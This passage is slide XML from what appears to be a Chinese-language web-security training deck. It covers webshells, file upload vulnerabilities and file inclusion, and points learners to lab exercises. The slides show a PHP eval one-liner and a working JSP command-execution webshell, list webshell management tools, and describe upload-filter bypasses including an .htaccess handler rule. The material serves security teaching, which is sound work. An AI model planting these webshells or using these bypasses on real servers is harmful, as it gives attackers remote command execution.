              <a:t>@eval($_POST['cmd']);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2354580" y="1219835"/>
            <a:ext cx="6530975" cy="38709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0005" y="528320"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>一句话木马</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1101090" y="1647190"/>
            <a:ext cx="10121265" cy="3138170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>&lt;%@ page import="java.io.*" %&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>&lt;%</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>String cmd = request.getParameter("cmd"); // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>获取请求中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Process p = Runtime.getRuntime().exec(cmd); // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>执行命令</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>String line;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>while ((line = in.readLine()) != null) {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>out.println(line); // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>输出执行结果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>%&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1149350" y="5208270"/>
            <a:ext cx="6072505" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>了解什么函数能够调用系统命令或者执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码</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70660" y="534035"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>大马</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2484120" y="179070"/>
            <a:ext cx="5299075" cy="2690495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="260350" y="2962275"/>
            <a:ext cx="7244080" cy="3796665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7925435" y="3805555"/>
            <a:ext cx="4064000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>合集：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:hlinkClick r:id="rId3" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>https://github.com/tennc/webshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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3185" y="546735"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>管理工具</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273175" y="1548765"/>
            <a:ext cx="9411970" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中国菜刀</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中国蚁剑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>  https://github.com/AntSwordProject/antSword</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>weevely   https://github.com/epinna/weevely3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>哥斯拉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> godzilla https://github.com/BeichenDream/Godzilla</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>冰蝎</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> behinder https://github.com/rebeyond/Behinder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>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77950" y="565785"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>文件上传漏洞原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1205230" y="1252220"/>
            <a:ext cx="9051925" cy="2030095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件上传漏洞是指用户上传了一个可执行的脚本文件，这个脚本文件绕过了网址的安全检测机制，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>并且通过这个脚本文件获得了执行服务器端命令的能力。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>前提：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、文件可</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>上传</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、文件可正常被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网站解析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、文件上传后可稳定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>存在</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7470" y="553085"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>文件上传常用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>trick</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1162050" y="1418590"/>
            <a:ext cx="10024745" cy="5077460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>前端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>控制，禁用或者删除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> MIME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>校验。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>BP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>抓包修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>content-type</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等价扩展名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>----------------------&gt;&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>.htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>绕过：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>&lt;FilesMatch "a.jpg"&gt;  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>         SetHandler application/x-httpd-php  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>&lt;/FilesMatch&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>各种解析问题导致的绕过：大小写绕过，空格绕过，点绕过，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>::$DATA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>绕过，双写绕过，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>截断</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图片马</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包含</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。。。。。。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6028690" y="1889760"/>
            <a:ext cx="5575935" cy="153924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3175" y="346075"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>练习时间</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="567690" y="1356995"/>
            <a:ext cx="10644505" cy="2306955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>upload-labs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>pass1-4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>BUUCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>极客大挑战</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> 2019]Upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>[MRCTF2020]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>你传你🐎呢</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>时间多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>再做：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>[ACTF2020 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>新生赛</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>]Upload</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7682230" y="173355"/>
            <a:ext cx="3530600" cy="1009650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5686425" y="3886835"/>
            <a:ext cx="6038850" cy="13906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8675" y="2803525"/>
            <a:ext cx="5435600" cy="752475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞</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23645" y="435610"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>为什么要文件包含</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1223645" y="1243330"/>
            <a:ext cx="9712960" cy="5323840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2273935" y="2486025"/>
            <a:ext cx="6381750" cy="2838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6825" y="584200"/>
            <a:ext cx="5046345" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>本地文件包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>远程文件包含</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
